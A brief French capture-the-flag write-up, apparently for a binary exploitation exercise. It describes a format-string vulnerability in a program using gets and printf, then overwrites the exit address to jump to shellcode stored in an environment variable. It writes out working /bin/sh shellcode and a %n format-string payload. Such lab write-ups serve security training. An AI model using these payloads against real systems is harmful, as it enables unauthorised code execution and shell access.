Le code fait appel a gets et printf.
La valeur entree dans le gets convertie les majuscule aux minuscules.
On va pouvoir exploiter le printf pour ecrire ce que l'on veux a l'adresse que l'on veux.
Pour obtenir le flag, on met un shellcode dans une variable d'environnement que
l'on va appeler en reecrivant sur l'adresse du exit.

En faisant quelques tests on trouve que le printf permet d'ecrire sur le 10eme
block sur la stack

ce qui donne:


export SHELLCODE=`python -c 'print "\x90"*80 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"'`

python -c 'print "\xe0\x97\x04\x08" + "\xe2\x97\x04\x08" + "%55405x" + "%10$n" + "%10122x" + "%11$n"'> /tmp/exploit
